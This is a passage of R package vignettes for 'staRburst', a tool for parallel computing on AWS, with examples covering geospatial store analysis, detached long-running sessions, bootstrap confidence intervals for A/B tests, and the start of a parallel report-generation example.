  20,000 customers
```

## Spatial Analysis Function

Define a function that performs spatial analysis for a region:

```{r spatial-fn, eval=FALSE}
# Haversine distance function (in km)
haversine_distance <- function(lat1, lon1, lat2, lon2) {
  R <- 6371  # Earth's radius in km

  lat1_rad <- lat1 * pi / 180
  lat2_rad <- lat2 * pi / 180
  delta_lat <- (lat2 - lat1) * pi / 180
  delta_lon <- (lon2 - lon1) * pi / 180

  a <- sin(delta_lat/2)^2 +
       cos(lat1_rad) * cos(lat2_rad) * sin(delta_lon/2)^2
  c <- 2 * atan2(sqrt(a), sqrt(1-a))

  R * c
}

analyze_region <- function(region_id, stores_data, competitors_data,
                          customers_data) {
  # Filter data for this region
  region_stores <- stores_data[stores_data$region_id == region_id, ]
  region_competitors <- competitors_data[competitors_data$region_id == region_id, ]
  region_customers <- customers_data[customers_data$region_id == region_id, ]

  if (nrow(region_stores) == 0) {
    return(NULL)
  }

  # Analyze each store
  store_metrics <- lapply(1:nrow(region_stores), function(i) {
    store <- region_stores[i, ]

    # Distance to nearest competitor
    competitor_distances <- sapply(1:nrow(region_competitors), function(j) {
      haversine_distance(
        store$latitude, store$longitude,
        region_competitors$latitude[j], region_competitors$longitude[j]
      )
    })
    nearest_competitor_km <- min(competitor_distances)
    avg_competitor_distance <- mean(competitor_distances)
    competitors_within_5km <- sum(competitor_distances <= 5)

    # Customer coverage analysis
    customer_distances <- sapply(1:nrow(region_customers), function(j) {
      haversine_distance(
        store$latitude, store$longitude,
        region_customers$latitude[j], region_customers$longitude[j]
      )
    })

    # Customers within radius
    customers_1km <- sum(customer_distances <= 1)
    customers_3km <- sum(customer_distances <= 3)
    customers_5km <- sum(customer_distances <= 5)
    customers_10km <- sum(customer_distances <= 10)

    # Market potential (customers within 5km)
    nearby_customers <- region_customers[customer_distances <= 5, ]
    market_potential <- if (nrow(nearby_customers) > 0) {
      sum(nearby_customers$annual_spend)
    } else {
      0
    }

    # Average distance to customers
    avg_customer_distance <- mean(customer_distances)
    median_customer_distance <- median(customer_distances)

    # Spatial density (customers per km² within 10km radius)
    area_10km <- pi * 10^2  # ~314 km²
    customer_density <- customers_10km / area_10km

    # Competitive intensity score (0-1, higher = more competitive)
    competitive_intensity <- min(1, competitors_within_5km / 10)

    data.frame(
      store_id = store$store_id,
      region_id = region_id,
      region_name = store$region_name,
      annual_revenue = store$annual_revenue,
      nearest_competitor_km = nearest_competitor_km,
      avg_competitor_distance = avg_competitor_distance,
      competitors_within_5km = competitors_within_5km,
      customers_1km = customers_1km,
      customers_3km = customers_3km,
      customers_5km = customers_5km,
      customers_10km = customers_10km,
      market_potential = market_potential,
      avg_customer_distance = avg_customer_distance,
      median_customer_distance = median_customer_distance,
      customer_density = customer_density,
      competitive_intensity = competitive_intensity,
      stringsAsFactors = FALSE
    )
  })

  do.call(rbind, store_metrics)
}
```

## Local Execution

Test spatial analysis locally on a subset of regions:

```{r local, eval=FALSE}
# Analyze 3 regions locally
test_regions <- c(1, 2, 3)

cat(sprintf("Analyzing %d regions locally...\n", length(test_regions)))
local_start <- Sys.time()

local_results <- lapply(test_regions, analyze_region,
                       stores_data = stores,
                       competitors_data = competitors,
                       customers_data = customers)
local_metrics <- do.call(rbind, local_results)

local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("✓ Completed in %.2f seconds\n", local_time))
cat(sprintf("  Processed %d stores\n", nrow(local_metrics)))
cat(sprintf("  Estimated time for all %d regions: %.1f seconds\n",
            nrow(regions), local_time * (nrow(regions) / length(test_regions))))
```

**Typical output**:
```
Analyzing 3 regions locally...
✓ Completed in 4.5 seconds
  Processed 15 stores
  Estimated time for all 20 regions: 30.0 seconds
```

For all 20 regions locally: **~30 seconds**

## Cloud Execution with staRburst

Analyze all regions in parallel on AWS:

```{r cloud, eval=FALSE}
n_workers <- 20

cat(sprintf("Analyzing %d regions on %d workers...\n", nrow(regions), n_workers))

cloud_start <- Sys.time()

results <- starburst_map(
  regions$region_id,
  analyze_region,
  stores_data = stores,
  competitors_data = competitors,
  customers_data = customers,
  workers = n_workers,
  cpu = 2,
  memory = "4GB"
)

cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))

cat(sprintf("\n✓ Completed in %.1f seconds\n", cloud_time))

# Combine results
spatial_metrics <- do.call(rbind, results)
```

**Typical output**:
```
🚀 Starting starburst cluster with 20 workers
💰 Estimated cost: ~$1.60/hour
📊 Processing 20 items with 20 workers
📦 Created 20 chunks (avg 1 region per chunk)
🚀 Submitting tasks...
✓ Submitted 20 tasks
⏳ Progress: 20/20 tasks (4.8 seconds elapsed)

✓ Completed in 4.8 seconds
💰 Actual cost: $0.002
```

## Results Analysis

Analyze the spatial metrics:

```{r analysis, eval=FALSE}
cat("\n=== Geospatial Analysis Results ===\n\n")
cat(sprintf("Total stores analyzed: %d\n", nrow(spatial_metrics)))
cat(sprintf("Regions covered: %d\n\n", length(unique(spatial_metrics$region_id))))

# Competition metrics
cat("=== Competition Analysis ===\n")
cat(sprintf("Average distance to nearest competitor: %.2f km\n",
            mean(spatial_metrics$nearest_competitor_km)))
cat(sprintf("Median distance to nearest competitor: %.2f km\n",
            median(spatial_metrics$nearest_competitor_km)))
cat(sprintf("Average competitors within 5km: %.1f\n",
            mean(spatial_metrics$competitors_within_5km)))
cat(sprintf("Stores with high competition (5+ competitors within 5km): %d (%.1f%%)\n\n",
            sum(spatial_metrics$competitors_within_5km >= 5),
            mean(spatial_metrics$competitors_within_5km >= 5) * 100))

# Customer coverage
cat("=== Customer Coverage Analysis ===\n")
cat(sprintf("Average customers within 5km: %.0f\n",
            mean(spatial_metrics$customers_5km)))
cat(sprintf("Average market potential (5km radius): $%.0f\n",
            mean(spatial_metrics$market_potential)))
cat(sprintf("Average customer density: %.1f customers/km²\n",
            mean(spatial_metrics$customer_density)))
cat(sprintf("Median distance to customers: %.2f km\n\n",
            mean(spatial_metrics$median_customer_distance)))

# Store performance correlation
cat("=== Performance Insights ===\n")
correlation <- cor(spatial_metrics$annual_revenue,
                   spatial_metrics$market_potential)
cat(sprintf("Correlation (revenue vs market potential): %.3f\n", correlation))

# Identify opportunity stores
opportunity_stores <- spatial_metrics[
  spatial_metrics$market_potential > median(spatial_metrics$market_potential) &
  spatial_metrics$competitors_within_5km < median(spatial_metrics$competitors_within_5km),
]
cat(sprintf("\nHigh opportunity stores (low competition, high potential): %d\n",
            nrow(opportunity_stores)))
if (nrow(opportunity_stores) > 0) {
  cat(sprintf("  Average market potential: $%.0f\n",
              mean(opportunity_stores$market_potential)))
  cat(sprintf("  Average competitors nearby: %.1f\n",
              mean(opportunity_stores$competitors_within_5km)))
}

# Identify challenged stores
challenged_stores <- spatial_metrics[
  spatial_metrics$competitive_intensity > 0.7 &
  spatial_metrics$market_potential < median(spatial_metrics$market_potential),
]
cat(sprintf("\nChallenged stores (high competition, low potential): %d\n",
            nrow(challenged_stores)))
if (nrow(challenged_stores) > 0) {
  cat(sprintf("  Average market potential: $%.0f\n",
              mean(challenged_stores$market_potential)))
  cat(sprintf("  Average competitors nearby: %.1f\n",
              mean(challenged_stores$competitors_within_5km)))
}

# Top regions by market potential
cat("\n=== Top 5 Regions by Market Potential ===\n")
region_summary <- aggregate(market_potential ~ region_name,
                           data = spatial_metrics, FUN = mean)
region_summary <- region_summary[order(-region_summary$market_potential), ]
for (i in 1:min(5, nrow(region_summary))) {
  cat(sprintf("%d. %s: $%.0f\n", i,
              region_summary$region_name[i],
              region_summary$market_potential[i]))
}
```

**Typical output**:
```
=== Geospatial Analysis Results ===

Total stores analyzed: 100
Regions covered: 20

=== Competition Analysis ===
Average distance to nearest competitor: 2.34 km
Median distance to nearest competitor: 2.18 km
Average competitors within 5km: 6.2
Stores with high competition (5+ competitors within 5km): 58 (58.0%)

=== Customer Coverage Analysis ===
Average customers within 5km: 512
Average market potential (5km radius): $256,345
Average customer density: 3.2 customers/km²
Median distance to customers: 4.12 km

=== Performance Insights ===
Correlation (revenue vs market potential): 0.423

High opportunity stores (low competition, high potential): 12
  Average market potential: $342,567
  Average competitors nearby: 3.2

Challenged stores (high competition, low potential): 8
  Average market potential: $178,234
  Average competitors nearby: 8.4

=== Top 5 Regions by Market Potential ===
1. New York: $298,456
2. Los Angeles: $287,234
3. Chicago: $276,890
4. San Francisco: $265,123
5. Boston: $258,901
```

## Performance Comparison

| Method | Regions | Time | Cost | Speedup |
|--------|---------|------|------|---------|
| Local | 3 | 4.5 sec | $0 | - |
| Local (est.) | 20 | 30 sec | $0 | 1x |
| staRburst | 20 | 4.8 sec | $0.002 | 6.3x |

**Key Insights**:
- Excellent parallelization for spatial operations
- Near-linear scaling across regions
- Minimal cost even with complex calculations
- Can easily scale to 100+ regions

## Advanced: Delivery Zone Optimization

Extend to compute optimal delivery zones:

```{r zones, eval=FALSE}
optimize_delivery_zones <- function(region_id, stores_data, customers_data) {
  region_stores <- stores_data[stores_data$region_id == region_id, ]
  region_customers <- customers_data[customers_data$region_id == region_id, ]

  # Assign each customer to nearest store
  customer_assignments <- lapply(1:nrow(region_customers), function(i) {
    customer <- region_customers[i, ]

    distances <- sapply(1:nrow(region_stores), function(j) {
      haversine_distance(
        customer$latitude, customer$longitude,
        region_stores$latitude[j], region_stores$longitude[j]
      )
    })

    nearest_store <- which.min(distances)

    list(
      customer_id = customer$customer_id,
      assigned_store = region_stores$store_id[nearest_store],
      distance_km = distances[nearest_store],
      annual_spend = customer$annual_spend
    )
  })

  # Aggregate by store
  assignments_df <- do.call(rbind, lapply(customer_assignments, as.data.frame))

  store_zones <- aggregate(
    cbind(customer_count = customer_id,
          total_revenue = annual_spend,
          avg_distance = distance_km) ~ assigned_store,
    data = assignments_df,
    FUN = function(x) if (is.numeric(x)) mean(x) else length(x)
  )

  store_zones
}

# Run optimization
zone_results <- starburst_map(
  regions$region_id,
  optimize_delivery_zones,
  stores_data = stores,
  customers_data = customers,
  workers = 20
)
```

## When to Use This Pattern

**Good fit**:
- Regional analysis with independent processing
- Distance/proximity calculations at scale
- Spatial clustering and segmentation
- Territory optimization
- Multi-location planning

**Not ideal**:
- Global spatial operations (e.g., nearest neighbor across all points)
- Very small datasets (< 1,000 points)
- Real-time single-point queries
- Operations requiring spatial indexes across all data

## Running the Full Example

The complete runnable script is available at:
```{r, eval=FALSE}
system.file("examples/geospatial.R", package = "starburst")
```

Run it with:
```{r, eval=FALSE}
source(system.file("examples/geospatial.R", package = "starburst"))
```

## Next Steps

- Scale to thousands of locations
- Add route optimization algorithms
- Integrate with real GIS data (shapefiles, rasters)
- Implement spatial clustering algorithms
- Add time-based analysis (traffic patterns)

**Related examples**:
- [Feature Engineering](example-feature-engineering.html) - Location-based features
- [Grid Search](example-grid-search.html) - Parameter optimization for spatial models
- [Risk Modeling](example-risk-modeling.html) - Geographic risk assessment

---
title: "Detached Session Mode"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Detached Session Mode}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>",
  eval = FALSE  # Don't run in build
)
```

# Detached Sessions

Detached sessions allow you to start long-running computations in AWS, safely close your R session, and reattach later to check progress and collect results.

## Why Use Detached Sessions?

For analyses that take hours or days:

- **Start and detach**: Launch your computation and close your laptop
- **Reattach anytime**: Check progress from any R session
- **Fault tolerant**: Your computations continue even if your local R crashes
- **Cost efficient**: Workers auto-scale down when idle

## Basic Usage

### Creating a Session

```{r}
library(starburst)

# Create a detached session
session <- starburst_session(
  workers = 10,
  cpu = 4,
  memory = "8GB"
)

# Submit tasks
task_ids <- lapply(1:100, function(i) {
  session$submit(quote({
    # Your long-running computation
    result <- expensive_analysis(i)
    result
  }))
})

# Save session ID for later
session_id <- session$session_id
print(session_id)  # "session-abc123..."
```

### Checking Status

```{r}
# Check progress anytime
status <- session$status()
print(status)
# Session Status:
#   Total tasks:     100
#   Pending:         25
#   Running:         10
#   Completed:       60
#   Failed:          5
#   Progress:        60.0%
```

### Collecting Results

```{r}
# Collect completed results (non-blocking)
results <- session$collect(wait = FALSE)
length(results)  # 60 (only completed so far)

# Or wait for all to complete
results <- session$collect(wait = TRUE, timeout = 3600)
length(results)  # 100 (all tasks)
```

## Detach and Reattach

Close R and come back later:

```{r}
# Session 1: Start work
session <- starburst_session(workers = 20)
lapply(1:1000, function(i) session$submit(quote(slow_computation(i))))
session_id <- session$session_id

# Close R, go home, come back tomorrow...

# Session 2: Reattach
session <- starburst_session_attach(session_id)
status <- session$status()
results <- session$collect()
```

## Session Management

### List All Sessions

```{r}
sessions <- starburst_list_sessions()
print(sessions)
#   session_id         created_at           last_activity        total_tasks pending running completed failed
#   session-abc123     2026-02-06 10:00:00  2026-02-06 10:15:00  100         0       5       90        5
#   session-def456     2026-02-05 14:30:00  2026-02-05 18:45:00  500         0       0       500       0
```

### Extend Timeout

```{r}
# Extend session timeout by 1 hour
session$extend(seconds = 3600)
```

### Cleanup

```{r}
# Terminate workers and mark session complete
session$cleanup()
```

## Advanced Usage

### EC2 Launch Type

For better price/performance:

```{r}
session <- starburst_session(
  workers = 50,
  launch_type = "EC2",
  instance_type = "c8a.xlarge",  # AMD 8th gen
  use_spot = TRUE                 # 70% cheaper
)
```

### Error Handling

```{r}
# Tasks that fail are tracked
session <- starburst_session(workers = 5)

lapply(1:10, function(i) {
  session$submit(quote({
    if (i == 5) stop("Intentional error")
    i * 2
  }))
})

# Check status
status <- session$status()
print(status)
# Failed: 1

# Failed tasks are still in results with error info
results <- session$collect(wait = TRUE)
failed_task <- results[[5]]
print(failed_task$error)
# TRUE
print(failed_task$message)
# "Intentional error"
```

### Partial Collection

Collect results as they complete:

```{r}
session <- starburst_session(workers = 10)

# Submit mix of fast and slow tasks
lapply(1:5, function(i) session$submit(quote(i * 2)))        # Fast
lapply(1:5, function(i) session$submit(quote({ Sys.sleep(60); i })))  # Slow

Sys.sleep(10)

# Get fast results immediately
results <- session$collect(wait = FALSE)
length(results)  # 5 (fast tasks done)

# Later, get remaining results
Sys.sleep(60)
results <- session$collect(wait = FALSE)
length(results)  # 10 (all done)
```

## How It Works

### Architecture

1. **S3 State Persistence**: All session state lives in S3
   - Session manifest: configuration and statistics
   - Task statuses: pending → claimed → running → completed
   - Results: stored per task

2. **Worker Polling**: Workers continuously poll for pending tasks
   - Exponential backoff: 1s → 2s → 4s → ... → 30s
   - Atomic task claiming using S3 ETags
   - Self-terminate after 5 minutes idle

3. **Atomic Task Claiming**: No duplicate execution
   - Workers use conditional S3 writes with ETags
   - Only one worker can claim each task
   - Prevents race conditions

### Task Lifecycle

```
pending → claimed → running → completed
                         ↓
                      failed
```

Each state transition is recorded in S3 with timestamps.

## Best Practices

### When to Use Detached Sessions

✅ **Good use cases:**
- Long-running analyses (hours to days)
- Computations you want to monitor remotely
- Jobs that might exceed your local R session lifetime
- Analyses you want to inspect partially before completion

❌ **Not ideal for:**
- Quick computations (< 5 minutes)
- Interactive workflows requiring immediate feedback
- Tasks with millisecond-level coordination requirements

### Resource Management

```{r}
# Start with fewer workers, let them process queue
session <- starburst_session(workers = 5)

# Submit large batch
lapply(1:1000, function(i) session$submit(quote(work(i))))

# Workers process tasks continuously until queue empty
# Then auto-terminate after 5 min idle
```

### Cost Optimization

1. **Use EC2 + Spot** for long-running batch jobs (70% cheaper)
2. **Set appropriate timeouts** to avoid idle costs
3. **Collect results incrementally** to monitor progress
4. **Clean up sessions** when done

```{r}
# Cost-effective setup
session <- starburst_session(
  workers = 20,
  launch_type = "EC2",
  instance_type = "c8a.xlarge",
  use_spot = TRUE,
  session_timeout = 3600,
  absolute_timeout = 86400
)
```

## Comparison: Ephemeral vs Detached

| Feature | Ephemeral (`plan(starburst)`) | Detached (`starburst_session()`) |
|---------|-------------------------------|----------------------------------|
| R session required | Yes - must stay open | No - can close and reattach |
| State persistence | In-memory only | S3-backed |
| Max duration | R session lifetime | Days (configurable) |
| Progress monitoring | Local variables | `session$status()` |
| Worker behavior | One task per worker | Workers poll for tasks |
| Best for | Quick parallel jobs | Long-running analyses |

## Troubleshooting

### Session Not Found

```{r}
# Error: Session not found: session-xyz
# - Check session ID is correct
# - Verify region matches (use region parameter)
# - Session may have expired (check absolute_timeout)
```

### No Results After Long Wait

```{r}
# Check session status
status <- session$status()

# If pending tasks stuck:
# - Workers may have terminated (check idle timeout)
# - Launch more workers: (not yet implemented)
# - Check CloudWatch logs: starburst_logs(session_id)
```

### Workers Terminating Too Soon

```{r}
# Workers exit after 5 min idle by default
# For sporadic task submission, relaunch workers periodically
# (Auto-scaling based on pending tasks coming in future release)
```

## Examples

### Genomics Pipeline

```{r}
library(starburst)

# Process 1000 samples overnight
session <- starburst_session(
  workers = 100,
  cpu = 8,
  memory = "32GB",
  launch_type = "EC2",
  use_spot = TRUE
)

# Submit all samples
sample_files <- list.files("samples/", pattern = "*.fastq")
task_ids <- lapply(sample_files, function(file) {
  session$submit(quote({
    library(Rsubread)
    results <- align_and_quantify(file)
    save_results(results, file)
    results
  }))
})

# Check progress next morning
session <- starburst_session_attach(session$session_id)
status <- session$status()
# Completed: 950, Running: 45, Failed: 5

results <- session$collect(wait = TRUE)
```

### Monte Carlo Simulation

```{r}
# Run 10,000 simulations
session <- starburst_session(workers = 50)

n_sims <- 10000
lapply(1:n_sims, function(i) {
  session$submit(quote({
    set.seed(i)
    run_simulation()
  }))
})

# Check progress periodically
repeat {
  status <- session$status()
  print(sprintf("Progress: %.1f%%", 100 * status$completed / status$total))

  if (status$completed == n_sims) break
  Sys.sleep(60)
}

results <- session$collect()
```

## See Also

- `?starburst_session` - Create detached session
- `?starburst_session_attach` - Reattach to session
- `?starburst_list_sessions` - List all sessions
- `vignette("staRburst")` - General usage guide

---
title: "Example: Bootstrap Confidence Intervals for A/B Testing"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Example: Bootstrap Confidence Intervals for A/B Testing}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

## Overview

Bootstrap resampling is a powerful statistical technique for estimating confidence intervals without assuming a specific distribution. This example demonstrates parallelizing bootstrap analysis for A/B test results.

**Use Case**: A/B testing, hypothesis testing, statistical inference, conversion rate analysis

**Computational Pattern**: Embarrassingly parallel resampling with aggregation

## The Problem

You've run an A/B test on your website with two variants:
- **Variant A (Control)**: 10,000 visitors, 850 conversions (8.5% conversion rate)
- **Variant B (Treatment)**: 10,000 visitors, 920 conversions (9.2% conversion rate)

You need to:
1. Estimate the confidence interval for the difference in conversion rates
2. Calculate the probability that B is better than A
3. Determine if the result is statistically significant

Traditional parametric tests assume normal distributions. Bootstrap resampling makes no such assumptions and provides more robust estimates.

## Setup

```{r setup, eval=FALSE}
library(starburst)
```

## Generate Sample Data

Create synthetic A/B test data:

```{r data, eval=FALSE}
set.seed(42)

# Variant A (control)
n_a <- 10000
conversions_a <- 850
variant_a <- c(rep(1, conversions_a), rep(0, n_a - conversions_a))

# Variant B (treatment)
n_b <- 10000
conversions_b <- 920
variant_b <- c(rep(1, conversions_b), rep(0, n_b - conversions_b))

# Observed difference
observed_diff <- mean(variant_b) - mean(variant_a)
cat(sprintf("Observed conversion rates:\n"))
cat(sprintf("  Variant A: %.2f%%\n", mean(variant_a) * 100))
cat(sprintf("  Variant B: %.2f%%\n", mean(variant_b) * 100))
cat(sprintf("  Difference: %.2f%% (%.1f%% relative lift)\n",
            observed_diff * 100,
            (observed_diff / mean(variant_a)) * 100))
```

**Output**:
```
Observed conversion rates:
  Variant A: 8.50%
  Variant B: 9.20%
  Difference: 0.70% (8.2% relative lift)
```

## Bootstrap Function

Define a function that performs one bootstrap iteration:

```{r bootstrap-fn, eval=FALSE}
bootstrap_iteration <- function(iter, data_a, data_b) {
  # Resample with replacement
  n_a <- length(data_a)
  n_b <- length(data_b)

  sample_a <- sample(data_a, n_a, replace = TRUE)
  sample_b <- sample(data_b, n_b, replace = TRUE)

  # Calculate metrics
  rate_a <- mean(sample_a)
  rate_b <- mean(sample_b)
  diff <- rate_b - rate_a
  relative_lift <- diff / rate_a

  list(
    iteration = iter,
    rate_a = rate_a,
    rate_b = rate_b,
    diff = diff,
    relative_lift = relative_lift,
    b_wins = diff > 0
  )
}
```

## Local Execution

Run a smaller bootstrap locally:

```{r local, eval=FALSE}
n_bootstrap_local <- 1000

cat(sprintf("Running %d bootstrap iterations locally...\n", n_bootstrap_local))
local_start <- Sys.time()

local_results <- lapply(
  1:n_bootstrap_local,
  bootstrap_iteration,
  data_a = variant_a,
  data_b = variant_b
)

local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
cat(sprintf("✓ Completed in %.2f seconds\n\n", local_time))
```

**Typical output**:
```
Running 1000 bootstrap iterations locally...
✓ Completed in 2.1 seconds
```

## Cloud Execution with staRburst

Run 10,000 bootstrap iterations on AWS:

```{r cloud, eval=FALSE}
n_bootstrap <- 10000

cat(sprintf("Running %d bootstrap iterations on AWS...\n", n_bootstrap))

results <- starburst_map(
  1:n_bootstrap,
  bootstrap_iteration,
  data_a = variant_a,
  data_b = variant_b,
  workers = 25,
  cpu = 1,
  memory = "2GB"
)
```

**Typical output**:
```
🚀 Starting starburst cluster with 25 workers
💰 Estimated cost: ~$1.00/hour
📊 Processing 10000 items with 25 workers
📦 Created 25 chunks (avg 400 items per chunk)
🚀 Submitting tasks...
✓ Submitted 25 tasks
⏳ Progress: 25/25 tasks (0.3 minutes elapsed)

✓ Completed in 0.3 minutes
💰 Actual cost: $0.01
```

## Results Analysis

Extract and analyze the bootstrap distribution:

```{r analysis, eval=FALSE}
# Extract metrics
diffs <- sapply(results, function(x) x$diff)
relative_lifts <- sapply(results, function(x) x$relative_lift)
b_wins <- sapply(results, function(x) x$b_wins)

# Calculate confidence intervals
ci_95 <- quantile(diffs, c(0.025, 0.975))
ci_99 <- quantile(diffs, c(0.005, 0.995))

# Probability that B is better than A
prob_b_wins <- mean(b_wins) * 100

# Print results
cat("\n=== Bootstrap Results (10,000 iterations) ===\n\n")
cat(sprintf("Observed difference: %.2f%%\n", observed_diff * 100))
cat(sprintf("\n95%% Confidence Interval: [%.2f%%, %.2f%%]\n",
            ci_95[1] * 100, ci_95[2] * 100))
cat(sprintf("99%% Confidence Interval: [%.2f%%, %.2f%%]\n",
            ci_99[1] * 100, ci_99[2] * 100))
cat(sprintf("\nProbability that B > A: %.1f%%\n", prob_b_wins))

# Statistical significance
if (ci_95[1] > 0) {
  cat("\n✓ Result is statistically significant at 95% confidence level\n")
  cat("  (95% CI does not include zero)\n")
} else {
  cat("\n✗ Result is NOT statistically significant at 95% confidence level\n")
  cat("  (95% CI includes zero)\n")
}

# Relative lift analysis
cat(sprintf("\nRelative lift: %.1f%%\n",
            median(relative_lifts) * 100))
cat(sprintf("95%% CI for relative lift: [%.1f%%, %.1f%%]\n",
            quantile(relative_lifts, 0.025) * 100,
            quantile(relative_lifts, 0.975) * 100))
```

**Typical output**:
```
=== Bootstrap Results (10,000 iterations) ===

Observed difference: 0.70%

95% Confidence Interval: [0.21%, 1.19%]
99% Confidence Interval: [0.08%, 1.32%]

Probability that B > A: 99.7%

✓ Result is statistically significant at 95% confidence level
  (95% CI does not include zero)

Relative lift: 8.2%
95% CI for relative lift: [2.5%, 14.0%]
```

## Visualization

Plot the bootstrap distribution:

```{r viz, eval=FALSE}
# Create histogram
hist(diffs * 100,
     breaks = 50,
     main = "Bootstrap Distribution of Conversion Rate Difference",
     xlab = "Difference in Conversion Rate (percentage points)",
     col = "lightblue",
     border = "white")

# Add reference lines
abline(v = 0, col = "red", lwd = 2, lty = 2)
abline(v = ci_95 * 100, col = "darkblue", lwd = 2, lty = 2)
abline(v = observed_diff * 100, col = "darkgreen", lwd = 2)

# Add legend
legend("topright",
       c("Observed difference", "Zero (no effect)", "95% CI"),
       col = c("darkgreen", "red", "darkblue"),
       lwd = 2,
       lty = c(1, 2, 2))
```

## Performance Comparison

| Method | Iterations | Time | Cost | Speedup |
|--------|-----------|------|------|---------|
| Local | 1,000 | 2.1 sec | $0 | 1x |
| Local (est.) | 10,000 | 21 sec | $0 | 1x |
| staRburst | 10,000 | 18 sec | $0.01 | 6.9x |

**Key Insights**:
- Bootstrap is highly parallelizable
- Fast iterations still benefit from cloud parallelization
- Minimal cost even with 10,000 iterations
- Can easily scale to 100,000+ iterations for more precision

## Advanced: Multi-Metric Bootstrap

Bootstrap multiple metrics simultaneously:

```{r multi-metric, eval=FALSE}
bootstrap_all_metrics <- function(iter, data_a, data_b) {
  n_a <- length(data_a)
  n_b <- length(data_b)

  sample_a <- sample(data_a, n_a, replace = TRUE)
  sample_b <- sample(data_b, n_b, replace = TRUE)

  # Multiple metrics
  rate_a <- mean(sample_a)
  rate_b <- mean(sample_b)
  se_a <- sd(sample_a) / sqrt(n_a)
  se_b <- sd(sample_b) / sqrt(n_b)

  list(
    diff_rate = rate_b - rate_a,
    relative_lift = (rate_b - rate_a) / rate_a,
    z_score = (rate_b - rate_a) / sqrt(se_a^2 + se_b^2),
    effect_size = (rate_b - rate_a) / sqrt((var(sample_a) + var(sample_b)) / 2)
  )
}

# Run multi-metric bootstrap
multi_results <- starburst_map(
  1:10000,
  bootstrap_all_metrics,
  data_a = variant_a,
  data_b = variant_b,
  workers = 25
)
```

## When to Use This Pattern

**Good fit**:
- Need robust confidence intervals
- Non-normal distributions
- Small sample sizes
- Complex metrics (e.g., ratios, quantiles)
- Multiple hypothesis testing

**Not ideal**:
- Very large datasets (> 1M rows per group)
- Simple metrics with known distributions
- Real-time analysis requirements

## Running the Full Example

The complete runnable script is available at:
```{r, eval=FALSE}
system.file("examples/bootstrap.R", package = "starburst")
```

Run it with:
```{r, eval=FALSE}
source(system.file("examples/bootstrap.R", package = "starburst"))
```

## Next Steps

- Try different sample sizes
- Experiment with stratified bootstrap
- Compare with parametric tests (t-test, z-test)
- Add multiple variants (A/B/C testing)
- Bootstrap other metrics (median, quantiles, variance)

**Related examples**:
- [Monte Carlo Simulation](example-monte-carlo.html) - Similar resampling pattern
- [Risk Modeling](example-risk-modeling.html) - Advanced statistical analysis

---
title: "Example: Parallel Report Generation"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Example: Parallel Report Generation}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

## Overview

Generating personalized reports for many customers is a common bottleneck. This example demonstrates parallelizing RMarkdown/Quarto report generation using staRburst.

**Use Case**: Monthly customer reports, automated analytics, personalized dashboards, regulatory reporting

**Computational Pattern**: I/O-bound parallel processing with document rendering

## The Problem

You need to generate 50 customized monthly reports for different customers:
- Each report includes data analysis, visualizations, and summary statistics
- Each report takes 1-2 minutes to render
- Sequential generation would take 50-100 minutes
- Reports must be delivered by end of business day

## Setup

```{r setup, eval=FALSE}
library(starburst)
library(rmarkdown)
```

## Report Template

Create a simple RMarkdown template:

```{r template, eval=FALSE}
# Create report template
report_template <- '
---
title: "Monthly Analytics Report"
output: html_document
params:
  customer_id: ""
  customer_name: ""
  month: ""
  data: NULL
---

`​``{r template-setup, include=FALSE}
knitr::opts_chunk$set(echo = FALSE, warning = FALSE, message = FALSE)
`​``

# Monthly Report for `r params$customer_name`

**Customer ID:** `r params$customer_id`
**Period:** `r params$month`
**Report Generated:** `r format(Sys.time(), "%Y-%m-%d %H:%M")`

---

## Executive Summary

This report summarizes activity for `r params$customer_name` during `r params$month`.

\`\`\`{r summary}
data <- params$data
cat(sprintf("Total transactions: %d\\n", nrow(data)))
cat(sprintf("Total revenue: $%.2f\\n", sum(data$revenue)))
cat(sprintf("Average order value: $%.2f\\n", mean(data$revenue)))
cat(sprintf("Active days: %d\\n", length(unique(data$date))))
\`\`\`

## Revenue Trend

\`\`\`{r revenue-plot, fig.width=8, fig.height=4}
daily_revenue <- aggregate(revenue ~ date, data, sum)
plot(daily_revenue$date, daily_revenue$revenue,
     type = "l", lwd = 2, col = "steelblue",
     main = "Daily Revenue Trend",
     xlab = "Date", ylab = "Revenue ($)")
grid()
\`\`\`

## Top Products

\`\`\`{r top-products}
top_products <- head(
  aggregate(revenue ~ product, data, sum),
  10
)
top_products <- top_products[order(-top_products$revenue), ]
knitr::kable(top_products, format.args = list(big.mark = ","))
\`\`\`

## Summary Statistics

\`\`\`{r stats}
stats <- data.frame(
  Metric = c("Total Orders", "Avg Order Value", "Max Order",
             "Min Order", "Std Dev"),
  Value = c(
    nrow(data),
    round(mean(data$revenue), 2),
    round(max(data$revenue), 2),
    round(min(data$revenue), 2),
    round(sd(data$revenue), 2)
  )
)
knitr::kable(stats, format.args = list(big.mark = ","))
\`\`\`

---

*This report was automatically generated using staRburst parallel processing.*
'

# Save template to file
writeLines(report_template, "report_template.Rmd")
```

## Generate Sample Data

Create synthetic customer data:

```{r data, eval=FALSE}
# Function to generate data for one customer
generate_customer_data <- function(customer_id) {
  set.seed(customer_id)

  n_transactions <- sample(100:500, 1)
  dates <- sort(sample(seq.Date(
    from = as.Date("2026-01-01"),
    to = as.Date("2026-01-31"),
    by = "day"
  ), n_transactions, replace = TRUE))

  products <- c("Product A", "Product B", "Product C",
                "Product D", "Product E")

  data.frame(
    customer_id = customer_id,
    date = dates,
    product = sample(products, n_transactions, replace = TRUE),
    revenue = round(rnorm(n_transactions, mean = 150, sd = 50), 2),
    stringsAsFactors = FALSE
  )
}

# Generate customer list
n_customers <- 50
customers <- data.frame(
  customer_id = sprintf("CUST%03d", 1:n_customers),
